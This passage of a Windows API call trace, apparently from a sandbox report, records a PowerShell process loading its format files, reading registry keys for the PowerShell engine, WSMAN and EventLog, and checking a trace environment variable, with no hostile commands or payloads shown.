	[0300.291] ReadFile (in: hFile=0x32c, lpBuffer=0x2ebe260, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28cdf8, lpOverlapped=0x0 | out: lpBuffer=0x2ebe260*, lpNumberOfBytesRead=0x28cdf8*=0x0, lpOverlapped=0x0) returned 1
	[0300.291] CloseHandle (hObject=0x32c) returned 1
	[0300.291] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x28cb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0300.291] SetErrorMode (uMode=0x1) returned 0x1
	[0300.291] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x28cda0 | out: lpFileInformation=0x28cda0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x48b4)) returned 1
	[0300.291] SetErrorMode (uMode=0x1) returned 0x1
	[0300.291] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x28cad0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0300.291] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x28ce88 | out: phkResult=0x28ce88*=0x32c) returned 0x0
	[0300.292] RegQueryValueExW (in: hKey=0x32c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x28ce0c, lpData=0x0, lpcbData=0x28ce08*=0x0 | out: lpType=0x28ce0c*=0x1, lpData=0x0, lpcbData=0x28ce08*=0x56) returned 0x0
	[0300.292] CoTaskMemAlloc (cb=0x5a) returned 0x1b6ff740
	[0300.292] RegQueryValueExW (in: hKey=0x32c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x28cddc, lpData=0x1b6ff740, lpcbData=0x28cdd8*=0x56 | out: lpType=0x28cddc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x28cdd8*=0x56) returned 0x0
	[0300.292] CoTaskMemFree (pv=0x1b6ff740) 
	[0300.292] RegCloseKey (hKey=0x32c) returned 0x0
	[0300.292] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x28cad0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0300.292] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x28c980, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0300.292] CoCreateGuid (in: pguid=0x28d0b0 | out: pguid=0x28d0b0*(Data1=0xd29ce167, Data2=0xc424, Data3=0x48e2, Data4=([0]=0x8b, [1]=0xa, [2]=0xcf, [3]=0x92, [4]=0x2, [5]=0x4b, [6]=0x1a, [7]=0xf5))) returned 0x0
	[0300.293] CoCreateGuid (in: pguid=0x28d0b0 | out: pguid=0x28d0b0*(Data1=0xd337f1ed, Data2=0xbffa, Data3=0x4759, Data4=([0]=0x94, [1]=0x76, [2]=0x68, [3]=0xe7, [4]=0x5, [5]=0x97, [6]=0x34, [7]=0x39))) returned 0x0
	[0300.293] SetErrorMode (uMode=0x1) returned 0x1
	[0300.293] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x32c
	[0300.293] GetFileType (hFile=0x32c) returned 0x1
	[0300.293] SetErrorMode (uMode=0x1) returned 0x1
	[0300.293] GetFileType (hFile=0x32c) returned 0x1
	[0300.293] ReadFile (in: hFile=0x32c, lpBuffer=0x2efc048, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28cdf8, lpOverlapped=0x0 | out: lpBuffer=0x2efc048*, lpNumberOfBytesRead=0x28cdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0300.294] ReadFile (in: hFile=0x32c, lpBuffer=0x2efc048, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28cdf8, lpOverlapped=0x0 | out: lpBuffer=0x2efc048*, lpNumberOfBytesRead=0x28cdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0300.294] ReadFile (in: hFile=0x32c, lpBuffer=0x2efc048, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28cdf8, lpOverlapped=0x0 | out: lpBuffer=0x2efc048*, lpNumberOfBytesRead=0x28cdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0300.294] ReadFile (in: hFile=0x32c, lpBuffer=0x2efc048, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28cdf8, lpOverlapped=0x0 | out: lpBuffer=0x2efc048*, lpNumberOfBytesRead=0x28cdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0300.294] ReadFile (in: hFile=0x32c, lpBuffer=0x2efc048, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28cdf8, lpOverlapped=0x0 | out: lpBuffer=0x2efc048*, lpNumberOfBytesRead=0x28cdf8*=0xe98, lpOverlapped=0x0) returned 1
	[0300.295] ReadFile (in: hFile=0x32c, lpBuffer=0x2efb648, nNumberOfBytesToRead=0x168, lpNumberOfBytesRead=0x28cdf8, lpOverlapped=0x0 | out: lpBuffer=0x2efb648*, lpNumberOfBytesRead=0x28cdf8*=0x0, lpOverlapped=0x0) returned 1
	[0300.295] ReadFile (in: hFile=0x32c, lpBuffer=0x2efc048, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28cdf8, lpOverlapped=0x0 | out: lpBuffer=0x2efc048*, lpNumberOfBytesRead=0x28cdf8*=0x0, lpOverlapped=0x0) returned 1
	[0300.295] CloseHandle (hObject=0x32c) returned 1
	[0300.295] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x28cb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0300.295] SetErrorMode (uMode=0x1) returned 0x1
	[0300.295] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x28cda0 | out: lpFileInformation=0x28cda0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe603f2b9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x4e98)) returned 1
	[0300.295] SetErrorMode (uMode=0x1) returned 0x1
	[0300.295] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x28cad0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0300.296] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x28ce88 | out: phkResult=0x28ce88*=0x32c) returned 0x0
	[0300.296] RegQueryValueExW (in: hKey=0x32c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x28ce0c, lpData=0x0, lpcbData=0x28ce08*=0x0 | out: lpType=0x28ce0c*=0x1, lpData=0x0, lpcbData=0x28ce08*=0x56) returned 0x0
	[0300.296] CoTaskMemAlloc (cb=0x5a) returned 0x1b6ff740
	[0300.296] RegQueryValueExW (in: hKey=0x32c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x28cddc, lpData=0x1b6ff740, lpcbData=0x28cdd8*=0x56 | out: lpType=0x28cddc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x28cdd8*=0x56) returned 0x0
	[0300.296] CoTaskMemFree (pv=0x1b6ff740) 
	[0300.296] RegCloseKey (hKey=0x32c) returned 0x0
	[0300.296] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x28cad0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0300.296] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x28c980, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0300.297] VirtualQuery (in: lpAddress=0x28b920, lpBuffer=0x28c7e0, dwLength=0x30 | out: lpBuffer=0x28c7e0*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0300.297] CoCreateGuid (in: pguid=0x28d0b0 | out: pguid=0x28d0b0*(Data1=0x16136eb, Data2=0x69a8, Data3=0x42fb, Data4=([0]=0x89, [1]=0x3b, [2]=0x98, [3]=0x5d, [4]=0xa, [5]=0xf, [6]=0xc, [7]=0x82))) returned 0x0
	[0300.297] CoCreateGuid (in: pguid=0x28d0b0 | out: pguid=0x28d0b0*(Data1=0x74f9015b, Data2=0x63d2, Data3=0x4289, Data4=([0]=0xac, [1]=0x1, [2]=0xdb, [3]=0x6b, [4]=0x8f, [5]=0xa5, [6]=0x46, [7]=0x3d))) returned 0x0
	[0301.009] CoTaskMemAlloc (cb=0x104) returned 0x471c50
	[0301.009] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x471c50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0301.010] CoTaskMemFree (pv=0x471c50) 
	[0301.011] CoTaskMemAlloc (cb=0x104) returned 0x471c50
	[0301.011] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x471c50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0301.011] CoTaskMemFree (pv=0x471c50) 
	[0301.012] CoTaskMemAlloc (cb=0x104) returned 0x471c50
	[0301.012] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x471c50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0301.012] CoTaskMemFree (pv=0x471c50) 
	[0301.013] CoTaskMemAlloc (cb=0x104) returned 0x471c50
	[0301.013] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x471c50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0301.013] CoTaskMemFree (pv=0x471c50) 
	[0301.020] CoTaskMemAlloc (cb=0x104) returned 0x471c50
	[0301.020] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x471c50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0301.021] CoTaskMemFree (pv=0x471c50) 
	[0301.023] CoTaskMemAlloc (cb=0x104) returned 0x471c50
	[0301.023] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x471c50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0301.023] CoTaskMemFree (pv=0x471c50) 
	[0301.023] CoTaskMemAlloc (cb=0x104) returned 0x471c50
	[0301.023] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x471c50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0301.023] CoTaskMemFree (pv=0x471c50) 
	[0301.026] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d098 | out: phkResult=0x28d098*=0x32c) returned 0x0
	[0301.027] RegQueryInfoKeyW (in: hKey=0x32c, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x28cf9c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x28cf98, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x28cf9c*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x28cf98*=0x3, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0301.027] CoTaskMemFree (pv=0x0) 
	[0301.027] CoTaskMemAlloc (cb=0x204) returned 0x4b2780
	[0301.027] RegEnumValueW (in: hKey=0x32c, dwIndex=0x0, lpValueName=0x4b2780, lpcchValueName=0x28d048, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0x28d048, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0301.027] CoTaskMemFree (pv=0x4b2780) 
	[0301.028] CoTaskMemAlloc (cb=0x204) returned 0x4b2780
	[0301.028] RegEnumValueW (in: hKey=0x32c, dwIndex=0x1, lpValueName=0x4b2780, lpcchValueName=0x28d048, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0x28d048, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0301.028] CoTaskMemFree (pv=0x4b2780) 
	[0301.028] CoTaskMemAlloc (cb=0x204) returned 0x4b2780
	[0301.028] RegEnumValueW (in: hKey=0x32c, dwIndex=0x2, lpValueName=0x4b2780, lpcchValueName=0x28d048, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="UpdatedConfig", lpcchValueName=0x28d048, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0301.028] CoTaskMemFree (pv=0x4b2780) 
	[0301.028] RegQueryValueExW (in: hKey=0x32c, lpValueName="StackVersion", lpReserved=0x0, lpType=0x28d02c, lpData=0x0, lpcbData=0x28d028*=0x0 | out: lpType=0x28d02c*=0x1, lpData=0x0, lpcbData=0x28d028*=0x8) returned 0x0
	[0301.028] CoTaskMemAlloc (cb=0xc) returned 0x52f560
	[0301.028] RegQueryValueExW (in: hKey=0x32c, lpValueName="StackVersion", lpReserved=0x0, lpType=0x28cffc, lpData=0x52f560, lpcbData=0x28cff8*=0x8 | out: lpType=0x28cffc*=0x1, lpData="2.0", lpcbData=0x28cff8*=0x8) returned 0x0
	[0301.028] CoTaskMemFree (pv=0x52f560) 
	[0301.246] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0x28cfe8 | out: phkResult=0x28cfe8*=0x328) returned 0x0
	[0301.246] RegQueryInfoKeyW (in: hKey=0x328, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x28ceec, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x28cee8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x28ceec*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x28cee8*=0x3, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0301.246] CoTaskMemFree (pv=0x0) 
	[0301.246] CoTaskMemAlloc (cb=0x204) returned 0x4b2780
	[0301.246] RegEnumValueW (in: hKey=0x328, dwIndex=0x0, lpValueName=0x4b2780, lpcchValueName=0x28cf98, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0x28cf98, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0301.246] CoTaskMemFree (pv=0x4b2780) 
	[0301.246] CoTaskMemAlloc (cb=0x204) returned 0x4b2780
	[0301.246] RegEnumValueW (in: hKey=0x328, dwIndex=0x1, lpValueName=0x4b2780, lpcchValueName=0x28cf98, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0x28cf98, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0301.247] CoTaskMemFree (pv=0x4b2780) 
	[0301.247] CoTaskMemAlloc (cb=0x204) returned 0x4b2780
	[0301.247] RegEnumValueW (in: hKey=0x328, dwIndex=0x2, lpValueName=0x4b2780, lpcchValueName=0x28cf98, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="UpdatedConfig", lpcchValueName=0x28cf98, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0301.247] CoTaskMemFree (pv=0x4b2780) 
	[0301.247] RegQueryValueExW (in: hKey=0x328, lpValueName="StackVersion", lpReserved=0x0, lpType=0x28cf7c, lpData=0x0, lpcbData=0x28cf78*=0x0 | out: lpType=0x28cf7c*=0x1, lpData=0x0, lpcbData=0x28cf78*=0x8) returned 0x0
	[0301.247] CoTaskMemAlloc (cb=0xc) returned 0x52f840
	[0301.247] RegQueryValueExW (in: hKey=0x328, lpValueName="StackVersion", lpReserved=0x0, lpType=0x28cf4c, lpData=0x52f840, lpcbData=0x28cf48*=0x8 | out: lpType=0x28cf4c*=0x1, lpData="2.0", lpcbData=0x28cf48*=0x8) returned 0x0
	[0301.247] CoTaskMemFree (pv=0x52f840) 
	[0301.247] CoTaskMemAlloc (cb=0x104) returned 0x471c50
	[0301.247] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x471c50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0301.247] CoTaskMemFree (pv=0x471c50) 
	[0301.250] CoTaskMemAlloc (cb=0x104) returned 0x471c50
	[0301.250] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x471c50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0301.250] CoTaskMemFree (pv=0x471c50) 
	[0301.252] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d018 | out: phkResult=0x28d018*=0x300) returned 0x0
	[0301.254] RegQueryInfoKeyW (in: hKey=0x300, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x28cf8c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x28cf88, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x28cf8c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x28cf88*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0301.254] CoTaskMemFree (pv=0x0) 
	[0301.530] CoTaskMemAlloc (cb=0x204) returned 0x4b2780
	[0301.530] RegEnumKeyExW (in: hKey=0x300, dwIndex=0x0, lpName=0x4b2780, lpcchName=0x28d018, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x28d018, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0301.530] CoTaskMemFree (pv=0x4b2780) 
	[0301.530] CoTaskMemFree (pv=0x0) 
	[0301.530] CoTaskMemAlloc (cb=0x204) returned 0x4b2780
	[0301.530] RegEnumKeyExW (in: hKey=0x300, dwIndex=0x1, lpName=0x4b2780, lpcchName=0x28d018, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x28d018, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0301.530] CoTaskMemFree (pv=0x4b2780) 
	[0301.530] CoTaskMemFree (pv=0x0) 
	[0301.530] CoTaskMemAlloc (cb=0x204) returned 0x4b2780
	[0301.530] RegEnumKeyExW (in: hKey=0x300, dwIndex=0x2, lpName=0x4b2780, lpcchName=0x28d018, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x28d018, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0301.530] CoTaskMemFree (pv=0x4b2780) 
	[0301.530] CoTaskMemFree (pv=0x0) 
	[0301.530] CoTaskMemAlloc (cb=0x204) returned 0x4b2780
	[0301.530] RegEnumKeyExW (in: hKey=0x300, dwIndex=0x3, lpName=0x4b2780, lpcchName=0x28d018, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x28d018, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0301.530] CoTaskMemFree (pv=0x4b2780) 
	[0301.530] CoTaskMemFree (pv=0x0) 
	[0301.530] CoTaskMemAlloc (cb=0x204) returned 0x4b2780
	[0301.530] RegEnumKeyExW (in: hKey=0x300, dwIndex=0x4, lpName=0x4b2780, lpcchName=0x28d018, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x28d018, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0301.530] CoTaskMemFree (pv=0x4b2780) 
	[0301.531] CoTaskMemFree (pv=0x0) 
	[0301.531] CoTaskMemAlloc (cb=0x204) returned 0x4b2780
	[0301.531] RegEnumKeyExW (in: hKey=0x300, dwIndex=0x5, lpName=0x4b2780, lpcchName=0x28d018, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x28d018, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0301.531] CoTaskMemFree (pv=0x4b2780) 
	[0301.531] CoTaskMemFree (pv=0x0) 
	[0301.531] CoTaskMemAlloc (cb=0x204) returned 0x4b2780
	[0301.531] RegEnumKeyExW (in: hKey=0x300, dwIndex=0x6, lpName=0x4b2780, lpcchName=0x28d018, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x28d018, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0301.531] CoTaskMemFree (pv=0x4b2780) 
	[0301.531] CoTaskMemFree (pv=0x0) 
	[0301.531] CoTaskMemAlloc (cb=0x204) returned 0x4b2780
	[0301.531] RegEnumKeyExW (in: hKey=0x300, dwIndex=0x7, lpName=0x4b2780, lpcchName=0x28d018, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x28d018, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0301.531] CoTaskMemFree (pv=0x4b2780) 
	[0301.531] CoTaskMemFree (pv=0x0) 
	[0301.531] CoTaskMemAlloc (cb=0x204) returned 0x4b2780
	[0301.531] RegEnumKeyExW (in: hKey=0x300, dwIndex=0x8, lpName=0x4b2780, lpcchName=0x28d018, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x28d018, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0301.531] CoTaskMemFree (pv=0x4b2780) 
	[0301.531] CoTaskMemFree (pv=0x0) 
	[0301.531] RegOpenKeyExW (in: hKey=0x300, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d078 | out: phkResult=0x28d078*=0x304) returned 0x0
	[0301.531] RegOpenKeyExW (in: hKey=0x304, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d078 | out: phkResult=0x28d078*=0x0) returned 0x2
	[0301.531] RegOpenKeyExW (in: hKey=0x300, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d078 | out: phkResult=0x28d078*=0x308) returned 0x0
	[0301.531] RegOpenKeyExW (in: hKey=0x308, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d078 | out: phkResult=0x28d078*=0x0) returned 0x2
	[0301.532] RegOpenKeyExW (in: hKey=0x300, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d078 | out: phkResult=0x28d078*=0x1cc) returned 0x0
	[0301.532] RegOpenKeyExW (in: hKey=0x1cc, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d078 | out: phkResult=0x28d078*=0x0) returned 0x2
	[0301.532] RegOpenKeyExW (in: hKey=0x300, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d078 | out: phkResult=0x28d078*=0x330) returned 0x0
	[0301.532] RegOpenKeyExW (in: hKey=0x330, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d078 | out: phkResult=0x28d078*=0x0) returned 0x2
	[0301.532] RegOpenKeyExW (in: hKey=0x300, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d078 | out: phkResult=0x28d078*=0x334) returned 0x0
	[0301.532] RegOpenKeyExW (in: hKey=0x334, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d078 | out: phkResult=0x28d078*=0x0) returned 0x2
	[0301.532] RegOpenKeyExW (in: hKey=0x300, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d078 | out: phkResult=0x28d078*=0x338) returned 0x0
	[0301.532] RegOpenKeyExW (in: hKey=0x338, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d078 | out: phkResult=0x28d078*=0x0) returned 0x2
	[0301.532] RegOpenKeyExW (in: hKey=0x300, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d078 | out: phkResult=0x28d078*=0x33c) returned 0x0
	[0301.532] RegOpenKeyExW (in: hKey=0x33c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d078 | out: phkResult=0x28d078*=0x0) returned 0x2
	[0301.533] RegOpenKeyExW (in: hKey=0x300, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d078 | out: phkResult=0x28d078*=0x340) returned 0x0
	[0301.533] RegOpenKeyExW (in: hKey=0x340, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d078 | out: phkResult=0x28d078*=0x0) returned 0x2
	[0301.533] RegOpenKeyExW (in: hKey=0x300, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d078 | out: phkResult=0x28d078*=0x344) returned 0x0
	[0301.533] RegOpenKeyExW (in: hKey=0x344, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d078 | out: phkResult=0x28d078*=0x348) returned 0x0
	[0301.533] RegCloseKey (hKey=0x348) returned 0x0
	[0301.533] RegCloseKey (hKey=0x300) returned 0x0
	[0301.534] RegCloseKey (hKey=0x344) returned 0x0
	[0301.539] CoTaskMemAlloc (cb=0x804) returned 0x1b7220e0
